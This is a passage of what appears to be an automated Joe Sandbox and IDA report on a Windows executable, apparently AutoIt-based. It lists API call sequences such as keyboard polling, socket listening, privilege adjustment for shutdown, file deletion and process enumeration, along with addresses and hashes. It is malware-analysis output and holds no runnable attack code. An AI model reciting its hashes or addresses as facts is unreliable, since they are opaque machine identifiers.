                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C6BE
                                    • _wcscat.LIBCMT ref: 0090C6EE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C705
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C71E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0090C735
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0090C757
                                    • DragFinish.SHELL32(?), ref: 0090C75E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0090C851
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: 2c6224737f7a6502922d6b14a2107d838c97cd19a5e3290fd473298abcd1aaae
                                    • Instruction ID: a3ca32a1fe249b0faa4623b436ff612c4e45bc00d1c490c1b540d8c6cdde179a
                                    • Opcode Fuzzy Hash: 2c6224737f7a6502922d6b14a2107d838c97cd19a5e3290fd473298abcd1aaae
                                    • Instruction Fuzzy Hash: 64616A72108301AFC711EF64DC85EAFBBE8FF89714F400A2EF595921A1DB719A49CB52
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF113
                                    • _wcscmp.LIBCMT ref: 008EF128
                                    • _wcscmp.LIBCMT ref: 008EF13F
                                      • Part of subcall function 008E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E43A0
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EF16E
                                    • FindClose.KERNEL32(00000000), ref: 008EF179
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF195
                                    • _wcscmp.LIBCMT ref: 008EF1BC
                                    • _wcscmp.LIBCMT ref: 008EF1D3
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF1E5
                                    • SetCurrentDirectoryW.KERNEL32(00938920), ref: 008EF203
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF20D
                                    • FindClose.KERNEL32(00000000), ref: 008EF21A
                                    • FindClose.KERNEL32(00000000), ref: 008EF22C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 8685a6ad38df29fd3d1b99963147a33505728d5bf80de1f156eae89f6f279a2e
                                    • Instruction ID: 1716d58f2c217f3b6cfb3407314d938c9e79bbb9e8a30c0c329c64b5fd2b8f36
                                    • Opcode Fuzzy Hash: 8685a6ad38df29fd3d1b99963147a33505728d5bf80de1f156eae89f6f279a2e
                                    • Instruction Fuzzy Hash: 9B31E43650025DAEDB20AB69EC58AEE77ACFF86364F100171FA14E2091DB30DB45CB54
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA20F
                                    • __swprintf.LIBCMT ref: 008EA231
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA26E
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA293
                                    • _memset.LIBCMT ref: 008EA2B2
                                    • _wcsncpy.LIBCMT ref: 008EA2EE
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA323
                                    • CloseHandle.KERNEL32(00000000), ref: 008EA32E
                                    • RemoveDirectoryW.KERNEL32(?), ref: 008EA337
                                    • CloseHandle.KERNEL32(00000000), ref: 008EA341
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: dbc3d31dfe4ffe43646c865069569373beb70e7402c139bcc1d9ee2c600bf1dd
                                    • Instruction ID: 1689be7c5bc2122f60a1e9ff4c5822792bf4989f3969d74745fb6687119a02f7
                                    • Opcode Fuzzy Hash: dbc3d31dfe4ffe43646c865069569373beb70e7402c139bcc1d9ee2c600bf1dd
                                    • Instruction Fuzzy Hash: B0319F71504249ABDB20DFA5DC49FEB37BCFF89B41F1040B6F609D2560E670A7448B25
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C1FC
                                    • GetFocus.USER32 ref: 0090C20C
                                    • GetDlgCtrlID.USER32(00000000), ref: 0090C217
                                    • _memset.LIBCMT ref: 0090C342
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C36D
                                    • GetMenuItemCount.USER32(?), ref: 0090C38D
                                    • GetMenuItemID.USER32(?,00000000), ref: 0090C3A0
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C3D4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C41C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C454
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0090C489
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 204fad49d93d3167c6f46f87b693b7f450169c0e4fee28b1129876a05e328901
                                    • Instruction ID: 1b46974b52430e2995105b23c6b48701f31785fccdfe13df8fc2bad9f897325d
                                    • Opcode Fuzzy Hash: 204fad49d93d3167c6f46f87b693b7f450169c0e4fee28b1129876a05e328901
                                    • Instruction Fuzzy Hash: 38817DB16183019FD720DF58C894A7BBBE9FB88714F004A2EF995D72A1D730D905DB92
                                    APIs
                                      • Part of subcall function 008D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D821E
                                      • Part of subcall function 008D8202: GetLastError.KERNEL32(?,008D7CE2,?,?,?), ref: 008D8228
                                      • Part of subcall function 008D8202: GetProcessHeap.KERNEL32(00000008,?,?,008D7CE2,?,?,?), ref: 008D8237
                                      • Part of subcall function 008D8202: RtlAllocateHeap.NTDLL(00000000,?,008D7CE2), ref: 008D823E
                                      • Part of subcall function 008D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D8255
                                      • Part of subcall function 008D829F: GetProcessHeap.KERNEL32(00000008,008D7CF8,00000000,00000000,?,008D7CF8,?), ref: 008D82AB
                                      • Part of subcall function 008D829F: RtlAllocateHeap.NTDLL(00000000,?,008D7CF8), ref: 008D82B2
                                      • Part of subcall function 008D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D7CF8,?), ref: 008D82C3
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D7D13
                                    • _memset.LIBCMT ref: 008D7D28
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D7D47
                                    • GetLengthSid.ADVAPI32(?), ref: 008D7D58
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 008D7D95
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D7DB1
                                    • GetLengthSid.ADVAPI32(?), ref: 008D7DCE
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D7DDD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D7DE4
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D7E05
                                    • CopySid.ADVAPI32(00000000), ref: 008D7E0C
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D7E3D
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D7E63
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D7E77
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                    • Instruction ID: d21695e271db3f003a5832fad5b16cb9da465d5f8655881c5621ea4eac4499c1
                                    • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                    • Instruction Fuzzy Hash: D6615B71904209EFDF11DFA4DC85AEEBB7AFF44710F04826AE815E6391EB319A05DB60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: 420cd0d0cccdbe689b6026c5eedf04e93a4358199f95ec2e5d10ed8a95cea798
                                    • Instruction ID: 432a7dfe1441e6a131fbf26d86bd5a1d812e5cce1cf4008f920c2e2b7c273903
                                    • Opcode Fuzzy Hash: 420cd0d0cccdbe689b6026c5eedf04e93a4358199f95ec2e5d10ed8a95cea798
                                    • Instruction Fuzzy Hash: CF725D71E00219DBDF24DF58D884BAEB7B5FF44314F14816AE849EB390EB749A81CB90
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 008E0097
                                    • SetKeyboardState.USER32(?), ref: 008E0102
                                    • GetAsyncKeyState.USER32(000000A0), ref: 008E0122
                                    • GetKeyState.USER32(000000A0), ref: 008E0139
                                    • GetAsyncKeyState.USER32(000000A1), ref: 008E0168
                                    • GetKeyState.USER32(000000A1), ref: 008E0179
                                    • GetAsyncKeyState.USER32(00000011), ref: 008E01A5
                                    • GetKeyState.USER32(00000011), ref: 008E01B3
                                    • GetAsyncKeyState.USER32(00000012), ref: 008E01DC
                                    • GetKeyState.USER32(00000012), ref: 008E01EA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 008E0213
                                    • GetKeyState.USER32(0000005B), ref: 008E0221
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                    • Instruction ID: fb3fb48a64a0685f0ebfca1026bf04c12baa1195b7d8401f92e3f10d004bc75b
                                    • Opcode Fuzzy Hash: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                    • Instruction Fuzzy Hash: 2D51BA209047C819FB35D7A588547EABFB4EF13380F08499995C59A5C3DAE49BCCCF62
                                    APIs
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009004AC
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0090054B
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009005E3
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900822
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0090082F
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    APIs
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008E38A3
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E394B
                                    • MoveFileW.KERNEL32(?,?), ref: 008E395E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E397B
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E399D
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E39B9
                                    Strings
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF440
                                    • Sleep.KERNEL32(0000000A), ref: 008EF470
                                    • _wcscmp.LIBCMT ref: 008EF484
                                    • _wcscmp.LIBCMT ref: 008EF49F
                                    • FindNextFileW.KERNEL32(?,?), ref: 008EF53D
                                    • FindClose.KERNEL32(00000000), ref: 008EF553
                                    Strings
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • GetSystemMetrics.USER32(0000000F), ref: 0090D47C
                                    • GetSystemMetrics.USER32(0000000F), ref: 0090D49C
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0090D6D7
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090D6F5
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090D716
                                    • ShowWindow.USER32(00000003,00000000), ref: 0090D735
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0090D75A
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0090D77D
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                    • String ID:
                                    APIs
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008E3B89
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 008E3BD9
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BEA
                                    • FindClose.KERNEL32(00000000), ref: 008E3C01
                                    • FindClose.KERNEL32(00000000), ref: 008E3C0A
                                    Strings
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    APIs
                                      • Part of subcall function 008D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                      • Part of subcall function 008D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                      • Part of subcall function 008D87E1: GetLastError.KERNEL32 ref: 008D8865
                                    • ExitWindowsEx.USER32(?,00000000), ref: 008E51F9
                                    Strings
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008F62DC
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F62EB
                                    • bind.WS2_32(00000000,?,00000010), ref: 008F6307
                                    • listen.WS2_32(00000000,00000005), ref: 008F6316
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F6330
                                    • closesocket.WS2_32(00000000), ref: 008F6344
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • _memmove.LIBCMT ref: 008D0258
                                    • _memmove.LIBCMT ref: 008D036D
                                    • _memmove.LIBCMT ref: 008D0414
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008819FA
                                    • GetSysColor.USER32(0000000F), ref: 00881A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                      • Part of subcall function 00881290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                    Similarity
                                    • API ID: ColorDialogNtdllProc_$LongWindow
                                    • String ID:
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EBCE6
                                    • _wcscmp.LIBCMT ref: 008EBD16
                                    • _wcscmp.LIBCMT ref: 008EBD2B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EBD3C
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 008EBD6C
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: 262074c2a64a85dc3b236872332b6bc04fcad956084e634bef2f74d6bb9f40a6
                                    • Instruction ID: e65107c4dfa091f396df04d46af9671c5388dbb2b93b26a2ff85b4093ca3c164
                                    • Opcode Fuzzy Hash: 262074c2a64a85dc3b236872332b6bc04fcad956084e634bef2f74d6bb9f40a6
                                    • Instruction Fuzzy Hash: B0517C356046429FD714DF69D890EAAB3E8FF4A324F14462DE956C73A1DB30ED04CB92
                                    APIs
                                      • Part of subcall function 008F7D8B: inet_addr.WS2_32(00000000), ref: 008F7DB6
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 008F679E
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F67C7
                                    • bind.WS2_32(00000000,?,00000010), ref: 008F6800
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F680D
                                    • closesocket.WS2_32(00000000), ref: 008F6821
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: 5f69e8bd94acf70717cb917250a638d57a8a577d518cdfccbf12c18ba691acab
                                    • Instruction ID: de4380ebf01ddcfb4ef4ede5c35dcdd88937a33cd486c5bfdab164a336835cae
                                    • Opcode Fuzzy Hash: 5f69e8bd94acf70717cb917250a638d57a8a577d518cdfccbf12c18ba691acab
                                    • Instruction Fuzzy Hash: AE41C575640214AFDB50BF288C86F7E77A8FB09714F44856CFA5AEB3C2DA709D009792
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 883f8c76d15a10d7e303d448095a31ce265c42e3133c8b32d0d9bf58265e2526
                                    • Instruction ID: 2d533eae94bd59bf72f72c47cd6772b20ee3d4555c5206338d27abaebb5c3463
                                    • Opcode Fuzzy Hash: 883f8c76d15a10d7e303d448095a31ce265c42e3133c8b32d0d9bf58265e2526
                                    • Instruction Fuzzy Hash: 1B11B231300915AFEB316F269C58A6BBB9DFF847A1B464439F846D3291CBB09D018AA5
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D80C0
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D80CA
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D80D9
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D80E0
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D80F6
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                    • Instruction ID: 0f362c944ebbf53d4691500aadc92de2e8b4210b38b620fb05e9690ce489ee18
                                    • Opcode Fuzzy Hash: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                    • Instruction Fuzzy Hash: 66F06231258304EFEB304FA5EC9DE673BBCFF49B55B000126F945C6250CB619D45EA60
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 008EC432
                                    • CoCreateInstance.COMBASE(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC44A
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • CoUninitialize.COMBASE ref: 008EC6B7
                                    Strings
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                    • String ID: .lnk
                                    • API String ID: 2683427295-24824748
                                    • Opcode ID: da8fdfb31c23ec96ed74efb5f7df8b62c1472fec3e0ad0574e74989cbaf300dc
                                    • Instruction ID: 0a0011339245e6b1af583bfd28cfc57398f5803d6651b8a014c14d5705513cce
                                    • Opcode Fuzzy Hash: da8fdfb31c23ec96ed74efb5f7df8b62c1472fec3e0ad0574e74989cbaf300dc
                                    • Instruction Fuzzy Hash: 36A14C71104205AFD700EF58C881EABB7E8FF95358F04492CF596D71A2DB71EA49CB62
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: df8712b47c7d0f2ae2e0357c4b8b930ebf02376c73ad8866e6391acd05616ba2
                                    • Instruction ID: ea28380fb00796da80b5f25d1b24dde1061cdb019b9013db87a6ae89dc218868
                                    • Opcode Fuzzy Hash: df8712b47c7d0f2ae2e0357c4b8b930ebf02376c73ad8866e6391acd05616ba2
                                    • Instruction Fuzzy Hash: E92247716083019FDB24EF18C881B6AB7E4FB85714F18492DF99AD7291EB71E904CB93
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 008FEE3D
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 008FEE4B
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • Process32NextW.KERNEL32(00000000,?), ref: 008FEF0B
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008FEF1A
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 0df636e446b7689932464add3768ff5157b1aca2f14b364ca62f658e03eab0ea
                                    • Instruction ID: 8ddacf1af440c6e2e8ab331496cefb582d32d8a1b0b5d3156b8628f67b1baa1f
                                    • Opcode Fuzzy Hash: 0df636e446b7689932464add3768ff5157b1aca2f14b364ca62f658e03eab0ea
                                    • Instruction Fuzzy Hash: D4515B71508715AFD320EF28DC85E6BBBE8FF94710F50482DF595D62A1EB70A908CB92
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
